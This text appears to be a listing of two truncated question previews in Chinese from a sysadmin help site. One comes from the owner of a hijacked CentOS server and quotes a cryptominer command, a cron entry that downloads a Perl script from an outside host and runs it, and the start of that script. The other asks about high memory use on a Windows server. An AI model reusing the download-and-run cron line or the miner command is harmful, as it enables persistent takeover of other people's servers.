我有一个运行一些 wordpress 和 tomcat 网站的 CENTOS6 服务器。这两天一直在崩溃。经过调查,我们发现内核更新二进制文件在服务器上消耗了 100% 的 CPU。过程如下。
./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx
但是这个进程内核更新好像无效。可能是服务器被破坏了,这个进程是由黑客安装的,所以我杀死了这个进程并删除了 apache 用户的 cron 条目。
但不知何故,这个过程在几个小时后又开始了,cron 条目也恢复了,我正在寻找修改 cron 作业的东西。
Cron 入口(apache 用户)
/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
abc.txt
#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall …我有一台运行 sqlserver 和 tomcat 的具有 32 GB RAM 的 Windows 服务器。
在资源监视器中它显示超过 95% 的内存使用率,但是当我在进程中搜索所有进程时,每个进程消耗的内存不到 500 MB。
下面是一些来自服务器的顶级内存使用过程。
Tomcat7 (SYSTEM) 360 MB
sqlservr (SYSTEM) 328 MB
w3wp (NETWORK SERVICE) 302 MB
chrome (devel) 283 MB
svchost (SYSTEM) 266 MB
javaw (devel) 247 MB
...... 146 MB
Ssms (devel) 80 MB
NewRelic.ServerMonitor 69 MB
java (SYSTEM) 65 MB
...... (SYSTEM) 62 MB
explorer (devel) 54 MB
....... (devel) 49 MB
....... (SYSTEM) 40 MB
svchost 26 MB
....... (SYSTEM) 26 MB
WmiPrvSE …